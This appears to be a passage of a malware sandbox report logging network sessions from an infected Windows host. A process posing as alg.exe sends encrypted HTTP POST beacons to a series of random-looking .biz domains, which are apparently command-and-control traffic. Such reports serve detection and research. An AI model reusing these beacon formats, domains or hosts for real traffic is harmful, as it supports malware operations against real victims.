                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:29.053622007 CET | 778 | OUT | Data Raw: 10 6d 7b cc 9b 5a 47 f3 fe 02 00 00 61 92 a4 3a c3 bb d8 7b 83 b3 26 1e ea d0 ea 8e a9 b3 f3 f3 0e 3c fe d2 c2 cb 33 d9 e5 1e 36 4a 4a 7f 19 39 b0 c8 98 3f 55 16 f4 ab 04 d4 4d 8a f0 b5 c8 68 cc 5d 11 1e 10 70 a0 7b 4e 80 66 00 f7 50 b4 92 34 82
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: m{ZGa:{&<36JJ9?UMh]p{NfP4c6fI<qo4+g]!7;/j^>%K#@6%Lk0W+~~<'P@EQ"@@r&?_D<^]ppA[$ mJ>ptI\
Nov 18, 2024 09:58:30.516810894 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=76d3df5658b4bcadae454c9cc941aec1|155.94.241.187|1731920310|1731920310|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
100 | 192.168.2.7 | 50079 | 18.141.10.107 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:29.323323965 CET | 345 | OUT | POST /p HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:29.323367119 CET | 842 | OUT | Data Raw: 00 f9 33 41 54 13 de 9a 3e 03 00 00 24 e3 8d 34 18 a0 e6 0d 9f 3c 85 07 c8 24 18 65 c2 e7 50 4f 7a 5b e1 5e ec 00 3b ff 7d 6f a8 57 01 5d 6d fd 76 fd 0d fb 4a a8 fc fa 54 d1 bf 86 0a 82 5c d9 f8 14 8e 71 ef b4 2c a6 13 98 85 76 18 e5 cc eb a0 b2
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 3AT>$4<$ePOz[^;}oW]mvJT\q,vPIE,yk]'=LiD}gRNYmb52.=Gxbcx^kEJ6J}fYr+3q4-#^B$}}Apj#H#ipk<#@Xv
Nov 18, 2024 09:58:30.780033112 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=3fd5b546435c74fbf75e2719f3d6bbf2|155.94.241.187|1731920310|1731920310|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
101 | 192.168.2.7 | 50080 | 18.246.231.120 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:30.808743954 CET | 344 | OUT | POST /tcj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:30.808768034 CET | 842 | OUT | Data Raw: 22 eb 14 3c 4a 42 e2 99 3e 03 00 00 d1 57 68 15 06 ed 8a f4 38 4d c5 f2 87 60 09 4e 62 fb 31 9d 11 d2 bb 7e fc 5f b4 3c 96 51 d9 ba 56 ce 15 d6 dd 8e 37 1d 30 fb 68 d9 e8 64 c2 84 e5 c1 1d c3 85 43 82 66 97 25 2a 9e e6 ce 13 2f 23 ca 53 97 1f 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: "<JB>Wh8M`Nb1~_<QV70hdCf%*/#SOP^9W\&'t2J*cD>! !Bo4AI#\fG@j+R&S8a\ZYNaidcv[qZ#7t=|
Nov 18, 2024 09:58:31.635421038 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=ec1f2aa391e58fccb8ed7cc497d61187|155.94.241.187|1731920311|1731920311|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.7 | 50081 | 13.251.16.150 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:30.817739010 CET | 345 | OUT | POST /qwnv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:30.817814112 CET | 778 | OUT | Data Raw: df 0e ef ef 33 0b 4c 1d fe 02 00 00 08 a8 ad 91 6b e7 d7 3c 6f c1 93 60 36 96 33 16 8f f5 24 cd 0c 97 b7 76 be 6a 96 44 1c 69 35 e4 0a c0 3c 10 68 cb a2 72 a7 7c 7f 68 b9 ef aa eb 7a 8c 7e cd 62 d2 8e 55 b8 c6 09 ff e9 e5 f5 48 7c 9f a2 66 a4 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 3Lk<o`63$vjDi5<hr|hz~bUH|fl>cpJG(Ghg~*kO,-<kO0R&R<`1U}!dll07mJP/FD/UK_t]!WnO}q
Nov 18, 2024 09:58:32.270976067 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=41cd003de10cb601983c02fd970246ef|155.94.241.187|1731920311|1731920311|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
103 | 192.168.2.7 | 50082 | 18.208.156.248 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:31.653544903 CET | 351 | OUT | POST /npkowol HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:31.653558969 CET | 842 | OUT | Data Raw: 17 dc c0 ee 85 47 9e 38 3e 03 00 00 a8 45 a2 b7 85 03 99 19 54 2b bf e1 24 ac a3 6d 16 fc a4 a6 c3 82 d7 02 83 db 5f e7 96 9a 88 be c8 30 11 cb 73 68 56 91 b1 d8 d5 21 9c 60 cb 69 31 07 e8 c6 33 fb 6e 41 00 4d 54 24 9d ef 96 20 6f f8 b7 cb 06 04
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: G8>ET+$m_0shV!`i13nAMT$ ouX7Jk$Ml .-gh-cnEYvt7~,W|C".r5#fCqBW#@mQ{nIvEq5.I+yIIYf
Nov 18, 2024 09:58:32.324853897 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=0509a1ea59a34fcc2c389c4a48f03373|155.94.241.187|1731920312|1731920312|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
104 | 192.168.2.7 | 50083 | 13.251.16.150 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:32.378391027 CET | 357 | OUT | POST /kjhhbldlylrmqyc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:32.378391027 CET | 842 | OUT | Data Raw: 43 c4 f3 01 f8 de 3a b2 3e 03 00 00 5c 1f fc ec f3 9d ae 4f 17 5a 7a dc c4 d8 15 1d e3 a0 42 3e 8e bb fa 78 08 b7 3b 55 13 09 7b 0d f8 d8 01 cc a7 fd 78 e1 e7 da 37 fc ee 80 54 66 b4 34 c7 de 81 22 85 0f f8 c6 24 05 7d 3e 77 ca 05 58 63 5d c7 73
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: C:>\OZzB>x;U{x7Tf4"$}>wXc]sR\f:B|m;`lx^.M*jn Qe?y|d>9+r)afp^Z m&8IE^Sfm7~(]ZxuY
Nov 18, 2024 09:58:33.829129934 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=9a562469eed0cef89bddbc788624c2de|155.94.241.187|1731920313|1731920313|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.7 | 50084 | 18.208.156.248 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:32.552318096 CET | 347 | OUT | POST /vv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:32.552318096 CET | 778 | OUT | Data Raw: 49 1e 26 28 c3 3b 6b c1 fe 02 00 00 be cd 6e e5 26 35 ca f9 4b ae 0e 08 b2 45 5e 89 ca 32 11 1b de 71 d8 f6 88 5c 3c ac 2e 5d bb f2 4d 69 d3 43 28 a0 24 f3 ca 62 37 5b 7a 0c 17 24 fa c6 f4 71 2b 5d cd 58 97 d5 8d 65 a3 dd 37 d5 30 ed 7e 30 02 70
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: I&(;kn&5KE^2q\<.]MiC($b7[z$q+]Xe70~0p@cy0gx?n^%P+=r$etz,l5N3)a9J}U>HgpUm0&^?"e%Y9|6`MU@}>
Nov 18, 2024 09:58:33.236655951 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=cd11d5efdb18f94d16c6bd0d0be98a4a|155.94.241.187|1731920313|1731920313|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.7 | 50085 | 18.246.231.120 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:33.642745972 CET | 349 | OUT | POST /wufabwul HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:33.642745972 CET | 778 | OUT | Data Raw: 85 2d 26 19 98 42 41 04 fe 02 00 00 ae 4a 70 c7 cc c7 60 43 fc 53 9e 1f c5 3a 54 bf d0 28 cb d4 86 e8 3a 71 26 73 ea 20 76 92 72 70 7e d5 14 ca 9c e8 2f 9c 21 dd 3f 6a 35 cb 8b fa df 1d 77 6f 30 67 6d 77 dd 77 a0 de d2 9c 61 57 70 14 26 b3 b8 a4
Data Ascii: -&BAJp`CS:T(:q&s vrp~/!?j5wo0gmwwaWp&{+`s{ly-W}{pDA'Ha&CY7jz- \t8@O3^ID3htS*t1!?/\vfCJlPK4O
Nov 18, 2024 09:58:34.473037958 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=59a0e1c66ce28943c676eb8c951f4998|155.94.241.187|1731920314|1731920314|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
107 | 192.168.2.7 | 50086 | 13.251.16.150 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:33.847122908 CET | 346 | OUT | POST /n HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Nov 18, 2024 09:58:33.847156048 CET | 842 | OUT | Data Raw: 00 25 97 11 e6 8c 58 2b 3e 03 00 00 2d 66 3a 37 f2 70 ab 16 e4 0e f3 11 8f dd bb 7d be 42 82 6d d4 f9 a7 f0 c6 d2 51 f4 45 07 22 c6 9e d3 90 e1 e3 f1 bc 4f 23 9c 5e e3 7d 3c cd 2d 96 54 79 3d 26 9e d1 2b 77 ac cc 5d 70 9b 47 fd 27 ec 48 5c 22 b4
Data Ascii: %X+>-f:7p}BmQE"O#^}<-Ty=&+w]pG'H\"^f:iWCR}Q8H`zKU&oBIb4a\[%'crl{+/ZC'M"f${gBha:GZ#"lR'tHs"
Nov 18, 2024 09:58:35.281685114 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=57e0ef366fbcb3df848006d3df93753a|155.94.241.187|1731920315|1731920315|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.7 | 50087 | 44.221.84.105 | 80 | 5368 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:34.777458906 CET | 348 | OUT | POST /bjmq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hehckyov.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:34.777486086 CET | 778 | OUT | Data Raw: 2b ca 2c f4 c1 20 25 5e fe 02 00 00 ca d9 5c 5f 86 4d fa 8a cf 31 12 2a c3 46 a6 f6 c6 70 8c 61 6d 11 98 94 f0 e3 ab bc f9 e6 1b 47 16 5e 40 2e 22 74 21 b7 c4 ef 4b 57 c4 16 b5 74 0e da ae 23 da cf b5 53 67 b7 f4 81 19 d5 fe 6a 1f e1 d9 74 05 83
Data Ascii: +, %^\_M1*FpamG^@."t!KWt#Sgjt_7<}=7zs/R6tM9fs^>2^b?5m/Q7hi)/(lb-eHV-&wyhBpiRk{++:n&969|qL(S2t(W
Nov 18, 2024 09:58:35.436664104 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1f9a62ebf00b2d7f1021a4d0c2c18204|155.94.241.187|1731920315|1731920315|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      109192.168.2.75008834.211.97.4580
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:35.306063890 CET354OUTPOST /fcyfmvndcv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
Nov 18, 2024 09:58:35.306086063 CET | 842 | OUT | Data Raw: 89 c0 b8 2c 2b ce f0 99 3e 03 00 00 90 da 64 e3 27 90 1b 83 19 1a a9 d9 d4 04 dd df fc b3 bc 54 e1 1b b3 e5 62 5e d7 39 62 a9 fb 61 e6 a4 3d cc 42 80 60 7d 2a 37 4d c8 8f 6c 11 d7 b3 17 2f cb 69 2f 1b 7b 08 9b ff 0f 0c d2 ab 88 60 70 61 30 21 98
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ,+>d'Tb^9ba=B`}*7Ml/i/{`pa0!xKZ^"2et>Kp;S^ \6*(yMe.-]+xSi#bs1@Q)Vss:YdiyMbSw4`JlSr~#[!CQD9=\x Ubl)_!
Nov 18, 2024 09:58:36.127604961 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=b3d438f9888a78935b26d700073727fb|155.94.241.187|1731920316|1731920316|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.7 | 50089 | 54.244.188.177 | 80 | 5368 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:36.289880037 CET | 350 | OUT | POST /qtsndkyu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
Nov 18, 2024 09:58:36.289906025 CET | 778 | OUT | Data Raw: c9 ed 25 c3 85 1e a9 33 fe 02 00 00 d7 92 51 b5 fe 88 27 a1 1c 9b 8a 94 5a c0 8d 39 b0 ec 96 ba f5 e0 8d a2 59 bd 9e 33 db a1 c8 fb 56 bc 57 44 91 e0 2b c5 be a5 0b 65 83 50 e9 47 a7 8c 35 b1 66 c8 6a 39 6b 38 c7 51 8e 87 fa 0a 1d 48 ef 28 35 33
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: %3Q'Z9Y3VWD+ePG5fj9k8QH(53ltm1c*Du3cy:<[\qb,3P4oAKd4[Pu[?:G'+]L#/VND$a+:3G;UB
